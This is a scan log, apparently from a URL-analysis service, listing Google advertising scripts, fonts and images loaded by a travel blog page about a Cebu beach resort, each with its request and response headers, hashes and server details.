content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:28:39 GMT

GET
H3-Q050 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame 28C6 17 KB
7 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 513
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 28C6 2 KB
1 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 570
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame 28C6 118 KB
36 KB 15ms
14ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 28C6 13 KB
6 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5261
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H3-Q050 200 0d74ed574692e0488c8a49b73918ea59.js Show response
www.gstatic.com/mysidia/ Frame 28C6 25 KB
10 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/0d74ed574692e0488c8a49b73918ea59.js?tag=mysidia_one_click_handler_one_afma_2019

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

11909c0ebcd1e1258ecf3c2ef83688b057b08e5d92a9c715f4fe44c13f20f7b4

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 07:08:00 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 72186
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 10398
x-xss-protection: 0
expires: Wed, 30 Jun 2021 07:08:00 GMT

GET
H3-Q050 200 css
fonts.googleapis.com/ Frame 3ACD 3 KB
600 B 16ms
16ms Stylesheet
text/css 2a00:1450:4001:828::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=398161349&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065745&bpp=57&bdt=244&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=1352&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=2&uci=a!2&btvi=1&fsb=1&xpc=G2vAqXg6pL&p=https%3A//www.itravelrox.com&dtd=207

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

599325d39743959cdacb163b742dd6f622443a73f155364bbcc465a291ce0b5a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Fri, 02 Apr 2021 01:21:27 GMT
server: ESF
date: Fri, 02 Apr 2021 03:11:06 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 28C6 0
0 17ms
17ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CLIXdSYtmYIvkPIiN7_UPtOyywAuIw-XtYbPL66iXDeXY1NiVFBABIMXPnxNglYq4gsgHoAHawpmHA8gBCagDAcgDywSqBJgCT9CuhylJ-eMfHdD9lK2_oUfHemYP55VWlwMr01RWu5lkOO_H3-5X5a50sp8GXO03EUKIOHGob50MM-KiQOvi6Q3syWxRrFW_WOjJb4R3zyjI1XAuaYCVJijp6uomv0MxuRe1whhNGqs8GlxXrSY_tgnTtthO_4KL0cpsjmbruMQYhcGKI8GwV8x5S_vAqsEtaWvISTuQZZ1B5AfmdctR2RsZQWIK0CnM08_mYg9q8td096oLh5koBYQiVMHWoeRr9QSyCuEPv0hgM4_YuBIgX3FsbPZ7anb39kyywjovMXa91MPiWglVkIRgdOhrfv0qmmjgHhOmh3ebPMbeM0wmSkGiaevHJm-lwsrXXYA1xuN9sqIcHk-UZ8AE7_Xf1KcDkgUECAQYAZIFBAgFGASgBi6AB4695nioB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwDyBwQQ5vk_0ggJCIDhgBAQARgfgAoByAsB2BMNshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=LNr2drHndiw&template_id=5000&tpd=AGWhJmu6Mme8pXcwctRaSB-3mXMa09WxRwFkS81UWesH_4ae9Q

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=1661042523&adk=605609668&adf=2080630801&pi=t.ma~as.1661042523&w=1200&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-5&format=1200x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065804&bpp=1&bdt=303&idt=171&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280%2C745x187&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=200&ady=86&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=4&uci=a!4&fsb=1&xpc=Grt5bJypV6&p=https%3A//www.itravelrox.com&dtd=174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 load_preloaded_resource_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3ACD 1 KB
910 B 8ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/load_preloaded_resource_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

49aea8d1206dbb5e3c8a7d4db9274d2efa2111d8b53acb901efc378b1feca381

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:28:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 6147
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 882
x-xss-protection: 0
server: cafe
etag: 11243716317595354070
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:28:39 GMT

GET
H3-Q050 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame 3ACD 17 KB
7 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 513
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3ACD 2 KB
1 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 570
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame 3ACD 118 KB
36 KB 13ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 3ACD 13 KB
5 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5261
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H3-Q050 200 0d74ed574692e0488c8a49b73918ea59.js Show response
www.gstatic.com/mysidia/ Frame 3ACD 25 KB
10 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:810::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.gstatic.com/mysidia/0d74ed574692e0488c8a49b73918ea59.js?tag=mysidia_one_click_handler_one_afma_2019

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:810::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

11909c0ebcd1e1258ecf3c2ef83688b057b08e5d92a9c715f4fe44c13f20f7b4

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 07:08:00 GMT
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Thu, 25 Mar 2021 05:14:52 GMT
server: sffe
age: 72186
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7776000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 10398
x-xss-protection: 0
expires: Wed, 30 Jun 2021 07:08:00 GMT

GET
H3-Q050 200 downsize_200k_v1
tpc.googlesyndication.com/simgad/6414135683079772704/ Frame 3ACD 19 KB
19 KB 8ms
7ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/simgad/6414135683079772704/downsize_200k_v1?w=400&h=209

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

859a8cc546b2d555fcb77485e19a72248b5f6965838e7b19c9d92f22e2e0bbfd

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Tue, 30 Mar 2021 15:05:04 GMT
x-content-type-options: nosniff
age: 216362
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 19276
x-xss-protection: 0
last-modified: Thu, 28 Jan 2021 09:28:48 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
expires: Wed, 30 Mar 2022 15:05:04 GMT

GET
DATA 200
OK truncated
/ Frame 3ACD 209 B
0 Image
image/svg+xml

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: d7779d95203bed5280ee3281f856607f95ac5df680547356656c7109d7d0a6a6

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/svg+xml

GET
H3-Q050 200 downsize_200k_v1
tpc.googlesyndication.com/simgad/9264784204760531546/ Frame 28C6 44 KB
44 KB 7ms
7ms Image
image/jpeg 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://tpc.googlesyndication.com/simgad/9264784204760531546/downsize_200k_v1?w=600&h=314

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

97ac5ac3ac83595816f7a380d3a3fd6b365a22fc997e8bb66f65aea98e3ee242

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Mon, 29 Mar 2021 11:03:22 GMT
x-content-type-options: nosniff
age: 317264
x-dns-prefetch-control: off
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 45098
x-xss-protection: 0
last-modified: Sun, 13 Dec 2020 10:58:21 GMT
server: sffe
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
